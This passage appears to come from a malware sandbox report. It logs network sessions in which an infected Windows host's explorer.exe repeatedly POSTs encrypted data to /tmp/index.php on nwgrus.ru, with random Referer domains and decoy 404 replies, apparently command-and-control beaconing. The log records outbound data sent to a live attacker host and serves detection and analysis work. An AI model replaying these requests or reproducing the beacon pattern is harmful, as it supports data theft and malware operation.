Oct 1, 2024 15:17:35.545464039 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:17:35 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49747	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:17:35.553958893 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ikextycmggavxa.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 205 Host: nwgrus.ru
Oct 1, 2024 15:17:35.553971052 CEST	205	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 30 49 e6 a1 Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA -[k,vu0Ip_`zo2P#PofzVI77OduN}?B4o0{P_D.-gv1Y
Oct 1, 2024 15:17:36.688323021 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:17:36 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49748	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:17:36.697046995 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xflbmtqhirja.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 168 Host: nwgrus.ru
Oct 1, 2024 15:17:36.697081089 CEST	168	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 37 51 b3 87 Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA -[k,vu7Q/{ye{f#<5+ODKyZ#UdY4Y-6BlF
Oct 1, 2024 15:17:37.858297110 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:17:37 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49749	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:17:37.871206045 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pyqfoqocstl.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 149 Host: nwgrus.ru
Oct 1, 2024 15:17:37.871223927 CEST	149	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 5c 0e e7 aa Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA -[k,vu\t!@y8j-8c*5U@5}VyMFWXD</
Oct 1, 2024 15:17:38.979603052 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:17:38 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49750	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:17:38.987994909 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dijxohecsahmqya.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 319 Host: nwgrus.ru
Oct 1, 2024 15:17:38.988075972 CEST	319	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 55 5e ce 9d Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA -[k,vuU^i]tPDW(hW>`e]zf?\K^-eu%Z(pi^=a `GJ$<I{R1YoDx{eH:<9q
Oct 1, 2024 15:17:40.096661091 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:17:39 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49751	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:17:40.104718924 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fkwktqlntyvhlhv.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 271 Host: nwgrus.ru
Oct 1, 2024 15:17:40.104804993 CEST	271	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 45 21 ab 9d Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA -[k,vuE!n\#S7Dr<U37H,[`BJ4E~^Q$!F2;gB>(I8\3Yd1eB,]lI8C=Nq
Oct 1, 2024 15:17:41.358256102 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:17:41 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49752	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:17:41.422532082 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://axuolhuhwntg.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 261 Host: nwgrus.ru
Oct 1, 2024 15:17:41.422544956 CEST	261	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 2a 1b ba 82 Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA -[k,vuxTh`\|LJWF,CDW7/${Zk<6_"c9@D6.BIXDN8i9Hd<>-
Oct 1, 2024 15:17:42.684295893 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:17:42 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49753	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:17:42.692390919 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://obobrllwrvxobu.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 323 Host: nwgrus.ru
Oct 1, 2024 15:17:42.692410946 CEST	323	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 7b 20 d3 8f Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA -[k,vu{ XnGsl'}2%$3><[&H=[FW<T&+6E=x/ VL=U@l OoW*U!4
Oct 1, 2024 15:17:43.812161922 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:17:43 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49754	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:17:43.896550894 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://flkhebcbosbhs.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 127 Host: nwgrus.ru
Oct 1, 2024 15:17:43.896550894 CEST	127	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 4f 57 df e7 Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA -[k,vuOWyIO6uw O+6
Oct 1, 2024 15:17:45.121233940 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:17:44 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49755	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:17:45.129367113 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://sdipfhxrqta.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 147 Host: nwgrus.ru
Oct 1, 2024 15:17:45.129425049 CEST	147	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 5c 3f af e2 Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA -[k,vu\?%Xzp`:[RHo3LvF65LP2$wm
Oct 1, 2024 15:17:46.344868898 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:17:46 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49756	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:17:46.352650881 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ecqgmfmehrdfesh.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 276 Host: nwgrus.ru
Oct 1, 2024 15:17:46.352679968 CEST	276	OUT	Data Raw: 3b 6e 26 10 f0 cc 60 26 d7 a9 b3 01 0e 75 0e bb 7c 0b c8 93 62 03 92 11 0b 74 0c 95 35 cb c7 6f e9 5a ce 5d 0e 1e 52 6d e6 ec 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 6c 20 db e9 Data Ascii: ;n&`&u\|bt5oZ]Rm? 9Yt M@NA -[k,vul DEmhc]FYTy"rI'.^lS=;O8PTlh2?i0pV?ZiK<pD>3KvY@GfL"a\|xfkT%-&
Oct 1, 2024 15:17:47.480715036 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Tue, 01 Oct 2024 13:17:47 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49757	78.89.199.216	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
